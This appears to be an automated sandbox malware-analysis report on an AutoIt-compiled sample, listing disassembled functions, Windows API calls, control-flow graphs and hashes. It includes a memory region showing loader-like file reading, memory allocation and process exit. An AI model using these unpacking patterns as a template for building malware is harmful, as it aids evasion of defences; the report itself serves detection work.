                                                              • Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9837
                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003C9452
                                                            • _wcsncpy.LIBCMT ref: 003C94C5
                                                            • DeleteFileW.KERNEL32(?,?), ref: 003C94FB
                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003C9511
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003C9522
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003C9534
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 1500180987-0
                                                            • Opcode ID: e43db975d668dcffa6b4878b92ddc1e37616656ee94b07eaddd2bf9019cd91df
                                                            • Instruction ID: 9b156f3ba1a701b30a30a6a832e40f11cf0e5b6184617a5f3fb643c380d86c45
                                                            • Opcode Fuzzy Hash: e43db975d668dcffa6b4878b92ddc1e37616656ee94b07eaddd2bf9019cd91df
                                                            • Instruction Fuzzy Hash: 32C12AB1D00219AADF22DF95CC85FDEBBBDAF45310F0044AAF609EA151DB309E448F65
                                                            Function 0036301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00363074
                                                            • RegisterClassExW.USER32(00000030), ref: 0036309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003630AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 003630CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003630DC
                                                            • LoadIconW.USER32(000000A9), ref: 003630F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00363101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 8001da4f566df5225480be6b25409729359a940a66bc5266e7201cd2061d65e8
                                                            • Instruction ID: 143c8d3253955d3489b7f89cb32abd473717c9681cbb89b4750b18f213aa4bf6
                                                            • Opcode Fuzzy Hash: 8001da4f566df5225480be6b25409729359a940a66bc5266e7201cd2061d65e8
                                                            • Instruction Fuzzy Hash: ED3149B1940349EFDB619FA4D885AD9BBF4FB09310F10426AE580EA2A0D3F50596CF64
                                                            Function 00363041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00363074
                                                            • RegisterClassExW.USER32(00000030), ref: 0036309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003630AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 003630CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003630DC
                                                            • LoadIconW.USER32(000000A9), ref: 003630F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00363101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 215e3f0e4bdfbbee28bb5a7d3f92d6d167f2be96984b9af3cbb2d19bf124e276
                                                            • Instruction ID: a83a36bf51d28092fd6566a0540cdcc40262a56a6003091d2b2b91a10404afca
                                                            • Opcode Fuzzy Hash: 215e3f0e4bdfbbee28bb5a7d3f92d6d167f2be96984b9af3cbb2d19bf124e276
                                                            • Instruction Fuzzy Hash: AB21FCB1A01258EFDB21DF94EC88BDD7BF8FB08710F00422AF510AA2A0D7F145558F95
                                                            Function 0036708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00364706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004252F8,?,003637AE,?), ref: 00364724
                                                              • Part of subcall function 0038050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00367165), ref: 0038052D
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003671A8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0039E8C8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0039E909
                                                            • RegCloseKey.ADVAPI32(?), ref: 0039E947
                                                            • _wcscat.LIBCMT ref: 0039E9A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 2673923337-2727554177
                                                            • Opcode ID: b9b80a86667bd67eef26151a3dd2bc874ddd9b78c51aaabaa27d13ee8a65ed2f
                                                            • Instruction ID: 465104c37e8d7e4eedc0f4df5c775388c764b367aeb8a2f414afa7b227ff04b5
                                                            • Opcode Fuzzy Hash: b9b80a86667bd67eef26151a3dd2bc874ddd9b78c51aaabaa27d13ee8a65ed2f
                                                            • Instruction Fuzzy Hash: 04719E71608301DEC716EF25E8819ABBBE8FF84310F81497EF4458B1A0EB709949CB66
                                                            Function 00363633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 760 363633-363681 762 363683-363686 760->762 763 3636e1-3636e3 760->763 764 3636e7 762->764 765 363688-36368f 762->765 763->762 766 3636e5 763->766 770 39d0cc-39d0fa call 371070 call 371093 764->770 771 3636ed-3636f0 764->771 767 363695-36369a 765->767 768 36374b-363753 PostQuitMessage 765->768 769 3636ca-3636d2 DefWindowProcW 766->769 773 3636a0-3636a2 767->773 774 39d154-39d168 call 3c2527 767->774 775 363711-363713 768->775 776 3636d8-3636de 769->776 805 39d0ff-39d106 770->805 777 363715-36373c SetTimer RegisterWindowMessageW 771->777 778 3636f2-3636f3 771->778 780 363755-363764 call 3644a0 773->780 781 3636a8-3636ad 773->781 774->775 799 39d16e 774->799 775->776 777->775 782 36373e-363749 CreatePopupMenu 777->782 784 39d06f-39d072 778->784 785 3636f9-36370c KillTimer call 36443a call 363114 778->785 780->775 788 39d139-39d140 781->788 789 3636b3-3636b8 781->789 782->775 792 39d0a8-39d0c7 MoveWindow 784->792 793 39d074-39d076 784->793 785->775 788->769 795 39d146-39d14f call 3b7c36 788->795 797 3636be-3636c4 789->797 798 39d124-39d134 call 3c2d36 789->798 792->775 801 39d078-39d07b 793->801 802 39d097-39d0a3 SetFocus 793->802 795->769 797->769 797->805 798->775 799->769 801->797 806 39d081-39d092 call 371070 801->806 802->775 805->769 810 39d10c-39d11f call 36443a call 36434a 805->810 806->775 810->769
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 003636D2
                                                            • KillTimer.USER32(?,00000001), ref: 003636FC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0036371F
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0036372A
                                                            • CreatePopupMenu.USER32 ref: 0036373E
                                                            • PostQuitMessage.USER32(00000000), ref: 0036374D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated$%?
                                                            • API String ID: 129472671-4267315211
                                                            • Opcode ID: a27a08edca916a729e55c807f5300295b00f8eb8db56bb7422ae12008c836365
                                                            • Instruction ID: 849c0b9f61bea13db480f04c8b2583559200590866e0c977d6d6ba67b42f44ed
                                                            • Opcode Fuzzy Hash: a27a08edca916a729e55c807f5300295b00f8eb8db56bb7422ae12008c836365
                                                            • Instruction Fuzzy Hash: 3A4146B2300545BBDF336F28EC8AB793B58EB01300F948135F5029A2E9CAB49E519779
                                                            Function 00363A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00363A50
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00363A5F
                                                            • LoadIconW.USER32(00000063), ref: 00363A76
                                                            • LoadIconW.USER32(000000A4), ref: 00363A88
                                                            • LoadIconW.USER32(000000A2), ref: 00363A9A
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00363AC0
                                                            • RegisterClassExW.USER32(?), ref: 00363B16
                                                              • Part of subcall function 00363041: GetSysColorBrush.USER32(0000000F), ref: 00363074
                                                              • Part of subcall function 00363041: RegisterClassExW.USER32(00000030), ref: 0036309E
                                                              • Part of subcall function 00363041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003630AF
                                                              • Part of subcall function 00363041: InitCommonControlsEx.COMCTL32(?), ref: 003630CC
                                                              • Part of subcall function 00363041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003630DC
                                                              • Part of subcall function 00363041: LoadIconW.USER32(000000A9), ref: 003630F2
                                                              • Part of subcall function 00363041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00363101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 81734d4539b8539e1245788b4183dd7031fac49495a022f2aae86bc3c8aad939
                                                            • Instruction ID: fc92b9fb9fcbad9a3aa38efdc8146e895de4a2c62bbea1524ffcbc1025864964
                                                            • Opcode Fuzzy Hash: 81734d4539b8539e1245788b4183dd7031fac49495a022f2aae86bc3c8aad939
                                                            • Instruction Fuzzy Hash: CC215E74E00304EFEB21DFA4EC49BAD7BB4FB08711F4041AAF500AA2E1D3B556518FA8
                                                            Function 00363766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RB
                                                            • API String ID: 1825951767-219029296
                                                            • Opcode ID: 8e9d44c69a79b7cc158ad7fa0e4396a30b15afc690eba5d377fadb85e87c0f0b
                                                            • Instruction ID: 0ed538ab04a73d891072ce89ba2e00ca2a7276d2f0c7ef3855ae583cb57c9ad9
                                                            • Opcode Fuzzy Hash: 8e9d44c69a79b7cc158ad7fa0e4396a30b15afc690eba5d377fadb85e87c0f0b
                                                            • Instruction Fuzzy Hash: F5A16E7290022D9ACF16EBA0DC95AFEB778BF15310F40852AF415BB195DF745A08CB60
                                                            Function 0036F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00380162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00380193
                                                              • Part of subcall function 00380162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0038019B
                                                              • Part of subcall function 00380162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003801A6
                                                              • Part of subcall function 00380162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003801B1
                                                              • Part of subcall function 00380162: MapVirtualKeyW.USER32(00000011,00000000), ref: 003801B9
                                                              • Part of subcall function 00380162: MapVirtualKeyW.USER32(00000012,00000000), ref: 003801C1
                                                              • Part of subcall function 003760F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0036F930), ref: 00376154
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0036F9CD
                                                            • OleInitialize.OLE32(00000000), ref: 0036FA4A
                                                            • CloseHandle.KERNEL32(00000000), ref: 003A45C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID: <WB$\TB$%?$SB
                                                            • API String ID: 1986988660-697478888
                                                            • Opcode ID: c0caf8b01a9fcb540e58e6578fc6754caaf72064133d6dfa544f67a887c019db
                                                            • Instruction ID: 4c7b18dc296dc458e6f460f84dc2938dd7c0807612e78b3ab77756d5284a18e7
                                                            • Opcode Fuzzy Hash: c0caf8b01a9fcb540e58e6578fc6754caaf72064133d6dfa544f67a887c019db
                                                            • Instruction Fuzzy Hash: 5D81ADB0B01A40DFC3A5EF29B945729BBE5FB983167D0813AD418CB261EBB44586CF19
                                                            Function 016713B0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 983 16713b0-167145e call 166edd0 986 1671465-167148b call 16722c0 CreateFileW 983->986 989 1671492-16714a2 986->989 990 167148d 986->990 997 16714a4 989->997 998 16714a9-16714c3 VirtualAlloc 989->998 991 16715dd-16715e1 990->991 992 1671623-1671626 991->992 993 16715e3-16715e7 991->993 999 1671629-1671630 992->999 995 16715f3-16715f7 993->995 996 16715e9-16715ec 993->996 1000 1671607-167160b 995->1000 1001 16715f9-1671603 995->1001 996->995 997->991 1002 16714c5 998->1002 1003 16714ca-16714e1 ReadFile 998->1003 1004 1671685-167169a 999->1004 1005 1671632-167163d 999->1005 1008 167160d-1671617 1000->1008 1009 167161b 1000->1009 1001->1000 1002->991 1010 16714e3 1003->1010 1011 16714e8-1671528 VirtualAlloc 1003->1011 1006 167169c-16716a7 VirtualFree 1004->1006 1007 16716aa-16716b2 1004->1007 1012 1671641-167164d 1005->1012 1013 167163f 1005->1013 1006->1007 1008->1009 1009->992 1010->991 1016 167152f-167154a call 1672510 1011->1016 1017 167152a 1011->1017 1014 1671661-167166d 1012->1014 1015 167164f-167165f 1012->1015 1013->1004 1019 167166f-1671678 1014->1019 1020 167167a-1671680 1014->1020 1018 1671683 1015->1018 1023 1671555-167155f 1016->1023 1017->991 1018->999 1019->1018 1020->1018 1024 1671592-16715a6 call 1672320 1023->1024 1025 1671561-1671590 call 1672510 1023->1025 1031 16715aa-16715ae 1024->1031 1032 16715a8 1024->1032 1025->1023 1033 16715b0-16715b4 CloseHandle 1031->1033 1034 16715ba-16715be 1031->1034 1032->991 1033->1034 1035 16715c0-16715cb VirtualFree 1034->1035 1036 16715ce-16715d7 1034->1036 1035->1036 1036->986 1036->991
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01671481
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 016716A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                            • Instruction ID: 9bbebe0c569f632256550a40ecf5453dbd9988344916fe0b674ba0262acb8819
                                                            • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                            • Instruction Fuzzy Hash: 59A10774E00219EBEB14CFA4C994BEEBBB5FF49304F24815AE501BB280D7759A81CF94
                                                            Function 003639D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1114 3639d5-363a45 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00363A03
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00363A24
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00363A38
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00363A41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: 910183feb34e7371dfe001fa80f7bc9c2bc65a5129808d8a47ba5aaafd423469
                                                            • Instruction ID: 49c78bc4eec7e1a72a358853faa8de252a036114c085a0840924e96ff3abe3c7
                                                            • Opcode Fuzzy Hash: 910183feb34e7371dfe001fa80f7bc9c2bc65a5129808d8a47ba5aaafd423469
                                                            • Instruction Fuzzy Hash: 7FF03A706002A0BEEA3157236C48E7B2E7DD7C6F60F4001BAB900E61F0C2B10842CEB4
                                                            Function 01671180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1115 1671180-16712ac call 166edd0 call 1671070 CreateFileW 1122 16712b3-16712c3 1115->1122 1123 16712ae 1115->1123 1126 16712c5 1122->1126 1127 16712ca-16712e4 VirtualAlloc 1122->1127 1124 1671363-1671368 1123->1124 1126->1124 1128 16712e6 1127->1128 1129 16712e8-16712ff ReadFile 1127->1129 1128->1124 1130 1671303-167133d call 16710b0 call 1670070 1129->1130 1131 1671301 1129->1131 1136 167133f-1671354 call 1671100 1130->1136 1137 1671359-1671361 ExitProcess 1130->1137 1131->1124 1136->1137 1137->1124
                                                            APIs
                                                              • Part of subcall function 01671070: Sleep.KERNELBASE(000001F4), ref: 01671081
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 016712A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: AD70DBZW6DC8KT
                                                            • API String ID: 2694422964-3728862823
                                                            • Opcode ID: b3027d0bd29f41f16655be8028069cb4f5cad1b6242a8db9238b19936d6d3116
                                                            • Instruction ID: 42500348a1f4328ed9cd110198da334b20a6eff744fa7bc9e9a7b7893c894731
                                                            • Opcode Fuzzy Hash: b3027d0bd29f41f16655be8028069cb4f5cad1b6242a8db9238b19936d6d3116
                                                            • Instruction Fuzzy Hash: F4518070E04249EBEF11DBA4DC55BEEBB79AF19300F00419AE609BB2C0D7B94B45CB65
                                                            Function 0036407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1139 36407c-364092 1140 36416f-364173 1139->1140 1141 364098-3640ad call 367a16 1139->1141 1144 39d3c8-39d3d7 LoadStringW 1141->1144 1145 3640b3-3640d3 call 367bcc 1141->1145 1148 39d3e2-39d3fa call 367b2e call 366fe3 1144->1148 1145->1148 1149 3640d9-3640dd 1145->1149 1158 3640ed-36416a call 382de0 call 36454e call 382dbc Shell_NotifyIconW call 365904 1148->1158 1161 39d400-39d41e call 367cab call 366fe3 call 367cab 1148->1161 1151 364174-36417d call 368047 1149->1151 1152 3640e3-3640e8 call 367b2e 1149->1152 1151->1158 1152->1158 1158->1140 1161->1158
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0039D3D7
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            • _memset.LIBCMT ref: 003640FC
                                                            • _wcscpy.LIBCMT ref: 00364150
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00364160
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3942752672-1585850449
                                                            • Opcode ID: 0b4f1cbb18cfb767acc37d2d5100307916a8bf49bc581853fb8807a7d08009b0
                                                            • Instruction ID: bce2b2df68524a99e2d837ed313c8577dff3934343ac58e7f738685b585ddc33
                                                            • Opcode Fuzzy Hash: 0b4f1cbb18cfb767acc37d2d5100307916a8bf49bc581853fb8807a7d08009b0
